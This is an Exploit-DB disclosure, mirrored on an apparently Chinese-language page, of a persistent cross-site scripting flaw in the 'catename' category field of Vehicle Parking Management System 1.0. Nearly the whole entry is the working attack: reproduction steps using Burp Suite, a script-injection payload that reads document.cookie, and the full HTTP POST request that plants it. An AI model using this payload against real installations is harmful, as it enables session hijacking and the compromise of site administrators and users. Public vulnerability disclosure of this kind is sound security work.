Vehicle Parking Management System 1.0 – ‘catename’ Persistent Cross-Site Scripting (XSS)

  • 作者: Tushar Vaidya
    日期: 2021-02-25
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/49595/
  • # Exploit Title: Vehicle Parking Management System 1.0 - 'catename' Persistent Cross-Site Scripting (XSS)
    # Date: 2021-02-25
    # Exploit Author: Tushar Vaidya
    # Vendor Homepage: https://www.sourcecodester.com/php/14415/vehicle-parking-management-system-project-phpmysql-full-source-code.html
    # Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/lagos-parker-fullsource-code.zip
    # Version: v1.0
    # Tested on: Ubuntu
    
    
    *Steps to Reproduce:*
    1) Login with Admin Credentials and click on the '*Manage category*' button.
    2) Click on the '*Add Categories*'button.
    3) Now add the 'Ba1man' in the input field of '*Category*' and intercept it with Burp Suite.
    4) Now add the following payload input field of *Category *as a parameter name is *catename*
    
    Payload:ba1man"><script>alert(document.cookie)</script>
    
    4) Click On Save
    5) Now go to '*Manage category > View Categories*'
    5) XSS payload is triggered.
    
    *proof-of-concept:*
    1) Request:
    
    POST /lagos_parker/parker/addcategory.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
    Firefox/68.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost/lagos_parker/parker/addcategory.php
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 82
    Connection: close
    Cookie: PHPSESSID=6432hpio6v07igni4akosvdbmn
    Upgrade-Insecure-Requests: 1
    catename=ba1man"><script>alert(document.cookie)</script>&submit=